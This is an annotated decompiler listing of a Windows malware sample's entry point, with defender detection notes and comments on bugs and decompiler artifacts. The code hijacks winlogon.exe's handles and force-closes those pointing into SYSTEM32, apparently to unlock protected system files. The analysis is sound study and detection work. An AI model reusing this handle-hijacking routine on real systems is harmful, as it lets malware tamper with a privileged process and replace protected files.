/*
 * Decompiler (IDA Hex-Rays style) output of the sample's entry point.
 *
 * What the visible code does: enumerates every handle on the system via
 * NtQuerySystemInformation(SystemHandleInformation), picks out the handles
 * owned by winlogon.exe, duplicates each one into this process, asks
 * NtQueryObject for the object's name, and for any object whose name
 * contains WINDOWS\SYSTEM32 or WINNT\SYSTEM32 re-duplicates it with
 * DUPLICATE_CLOSE_SOURCE and closes the copy. The net effect is that
 * winlogon's own handle to that SYSTEM32 object is closed from outside
 * the process. Why the author wants those handles gone is not shown here;
 * presumably it is to release a lock a privileged process holds on a
 * system file (a classic handle-hijacking trick) -- confirm from the rest
 * of the sample.
 *
 * Detection notes for defenders (derived from the calls below):
 *  - OpenProcess on winlogon.exe with PROCESS_DUP_HANDLE (0x0040) as the
 *    only requested right is the cheapest observable; ProcessAccess
 *    telemetry (e.g. Sysmon Event 10) keyed on that mask and target.
 *  - DuplicateHandle with DUPLICATE_CLOSE_SOURCE where the source process
 *    is winlogon.exe.
 *  - User-mode callers of NtQuerySystemInformation(SystemHandleInformation)
 *    paired with NtQueryObject(ObjectNameInformation) in a loop.
 *
 * The v6/v7/v8/v9/v10 locals are decompiler stack-slot artifacts: they are
 * read but never assigned in this listing, so the loop bound and the
 * per-iteration hEntry reload should be understood as "count of handles"
 * and "current entry" respectively, not taken literally.
 */
void __cdecl start()
{
HMODULE hNtdll; // eax@1
HMODULE hNtdll2; // eax@1
int v2; // edx@5
SYSTEM_HANDLE_INFORMATION *hTable; // ecx@5  (mis-typed by the decompiler: used as an integer handle count below)
SYSTEM_HANDLE_TABLE_ENTRY_INFO *hEntry; // edi@5
HANDLE hCurrentProcess; // eax@7
SYSTEM_HANDLE_TABLE_ENTRY_INFO *v6; // [sp-3Ch] [bp-3Ch]@8
int v7; // [sp-38h] [bp-38h]@14
SYSTEM_HANDLE_INFORMATION *v8; // [sp-34h] [bp-34h]@14
int v9; // [sp-28h] [bp-28h]@6
SYSTEM_HANDLE_INFORMATION *v10; // [sp-24h] [bp-24h]@6
/* Helper defined elsewhere in the sample; the name suggests it enables
 * SeDebugPrivilege, which is what opening winlogon.exe requires -- verify. */
EnableDebug();
/* Resolve the two native APIs dynamically rather than importing them,
 * so they do not appear in the import table. */
hNtdll = GetModuleHandleA("NTDLL.DLL");
NtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
hNtdll2 = GetModuleHandleA("NTDLL.DLL");
NtQueryObject = GetProcAddress(hNtdll2, "NtQueryObject");
/* Only PROCESS_DUP_HANDLE is requested on winlogon -- the minimum needed
 * for DuplicateHandle below, and the access mask to alert on. The returned
 * handle is never checked for NULL; on failure every DuplicateHandle call
 * below simply fails and the loop runs to completion doing nothing. */
winlogon_pid = GetPidFromName("winlogon.exe");
hSourceProcessHandle = OpenProcess(PROCESS_DUP_HANDLE, 0, winlogon_pid);
/* Size-probe loop: start with a zero-length buffer, then grow by one page
 * until the call stops reporting STATUS_INFO_LENGTH_MISMATCH. Note that
 * if the very first probe returns any other status, lpAddress is never
 * allocated and the dereference after this block reads a NULL/stale
 * pointer. VirtualAlloc's result is also never checked. */
if ( NtQuerySystemInformation(SystemHandleInformation, 0, 0, &dwSize) == STATUS_INFO_LENGTH_MISMATCH )
{
do
{
dwSize += 4096;
if ( lpAddress )
VirtualFree(lpAddress, 0, 0x8000u); /* 0x8000 == MEM_RELEASE */
lpAddress = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_READWRITE);
}
while ( NtQuerySystemInformation(SystemHandleInformation, lpAddress, dwSize, &retLength) == STATUS_INFO_LENGTH_MISMATCH );
}
/* The buffer starts with a DWORD entry count followed immediately by the
 * array of SYSTEM_HANDLE_TABLE_ENTRY_INFO records (hence the +4). */
hTable = *lpAddress;
hEntry = (lpAddress + 4);
v2 = 0;
while ( 1 )
{
v10 = hTable;
v9 = v2;
/* Only handles whose owning PID is winlogon's are of interest. */
if ( *&hEntry->UniqueProcessId != winlogon_pid )
goto next_handle;
hCurrentProcess = GetCurrentProcess();
/* First duplication: a same-access copy into this process, used only to
 * find out what the handle refers to. */
if ( DuplicateHandle(
hSourceProcessHandle,
hEntry->HandleValue,
hCurrentProcess,
&TargetHandle,
0,
0,
DUPLICATE_SAME_ACCESS) )
{
/* 532 bytes == sizeof(OBJECT_NAME_INFORMATION) plus a MAX_PATH-ish
 * UNICODE buffer. NOTE(review): NtQueryObject(ObjectNameInformation)
 * is known to block indefinitely on some handle types (e.g. synchronous
 * named pipes); there is no guard against that here. */
if ( !NtQueryObject(TargetHandle, ObjectNameInformation, &pObjectName, 532, 0) )
{
CharUpperW(pObjectName.Name.Buffer);
/* strstrW is a sample-local helper; it is called as (needle, haystack)
 * and compared against 1, so presumably it returns 1 on "found" -- confirm.
 * A substring match means any path containing ...\SYSTEM32 qualifies. */
if ( strstrW(L"WINDOWS\\SYSTEM32", pObjectName.Name.Buffer) == 1
|| strstrW(L"WINNT\\SYSTEM32", pObjectName.Name.Buffer) == 1 )
{
/* Drop our inspection copy, then re-duplicate with
 * DUPLICATE_CLOSE_SOURCE: this closes the handle inside winlogon.exe.
 * Closing our copy afterwards leaves the object with one fewer
 * reference than before -- winlogon has effectively lost it. */
CloseHandle(TargetHandle);
DuplicateHandle(
hSourceProcessHandle,
hEntry->HandleValue,
hCurrentProcess,
&TargetHandle,
0,
0,
DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE);
CloseHandle(TargetHandle);
goto next_handle;
}
}
hEntry = v6; /* decompiler artifact: reload of the current entry pointer */
}
/* Reached both when the name did not match (closing the inspection copy)
 * and when DuplicateHandle itself failed -- in the latter case TargetHandle
 * still holds the previous iteration's already-closed value, so this is a
 * harmless double-close on the failure path. */
CloseHandle(TargetHandle);
next_handle:
hTable = v8;
v2 = v7 + 1;
/* Once every entry has been visited the buffer and winlogon handle are
 * released and the process exits. hCurrentProcess is uninitialised on the
 * path that skipped GetCurrentProcess() above; another decompiler artifact,
 * the intent is clearly "terminate self". */
if ( v7 + 1 >= v8 )
{
VirtualFree(lpAddress, 0, 0x8000u);
CloseHandle(hSourceProcessHandle);
TerminateProcess(hCurrentProcess, 0);
}
++hEntry;
}
}